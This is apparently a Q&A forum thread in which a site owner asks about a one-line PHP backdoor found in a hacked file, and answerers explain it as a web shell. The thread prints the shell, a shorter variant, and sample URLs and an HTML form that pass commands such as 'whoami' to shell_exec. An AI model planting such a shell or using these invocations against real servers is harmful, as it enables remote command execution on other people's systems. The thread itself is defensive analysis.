I found a line of script left by the hacker in one of my PHP files. And it reads like this:
<?php
($_=@$_GET[2]).@$_($_POST[1]);
?>
Can anyone please give some hints about what this line of code does? Thank you
Asked
Active
Viewed 2,036 times
9
AstroCB
- 12,337
- 20
- 57
- 73
user2926814
- 145
- 6
-
errors are suppressed..? – Mr. Alien Oct 29 '13 at 15:48
-
3This is used to call PHP functions with a simple URL. **Must** be removed as soon as possible. – zessx Oct 29 '13 at 15:51
-
8It's a PHP shell. If you rewrite it to `=($_=@$_GET[2]).@$_($_GET[1])?>` the URL `file.php?1=shell_exec&2=whoami` executes the command `whoami` on the shell. In your example, one param is passed by POST, one by GET – Reeno Oct 29 '13 at 15:52
-
1In general, it's not worth asking what hacked code does; it's usually obfuscated, and always does something nasty. First thing to do is remove it; restore your backups and make sure you've installed all available security patches for any third-party software you use. If you want to more spend time on it, spend that time working out how to avoid getting hacked again, rather than what the hack actually does. – Spudley Oct 29 '13 at 16:28
-
4@Spudley actually it can be **incredibly helpful** to figure out what the code does. If you're being hacked by a script kiddie, you can pwn the pwnr. It's also incredibly useful to know what the code does so that you can mitigate the damage done by the attack. In this case we know that the attacker was executing shell commands... he could have escalated to uid=0. – Charles D Pantoga Oct 29 '13 at 16:54
3 Answers
10
I already posted it as a comment since the question was on hold, here now as an answer:
It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
Reeno
- 5,720
- 11
- 37
- 50
8
As Reeno already said in a comment, it's like a PHP shell.
Explanation
Store the GET variable with the key '2' in a variable called
$_. Due to PHP's nature of weak typing, we do not need quotes around the number.$_=@$_GET[2]Treat
$_as a callable function name and execute it with$_POST[1]as the first argument.@$_($_POST[1])
The @ operators should suppress error logging, see PHP.net: Error Control Operators.
The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:
$_=@$_GET[2];
@$_($_POST[1]);
Use case
Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.
ComFreek
- 29,044
- 18
- 104
- 156
6
First of all, you must remove those lines as soon as possible.
This code is used to call PHP functions. To give you an example, your hacker will use this kind of form :
<form method="post" action="http://site.com/page.php?2=shell_exec">
<input name="1" value="ipconfig -all"/>
<input type="submit" value="Send"/>
</form>
You'll then get this values :
$_=$_GET[2]=shell_exec$_POST[1]=ipconfig -all$_($_POST[1])=$_("ipconfig -all")=shell_exec("ipconfig -all")
@ are here to disable errors.
A simpler example would be to use this code :
<?= @$_GET['c'](@$_GET['p']); ?>
With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all .
zessx
- 68,042
- 28
- 135
- 158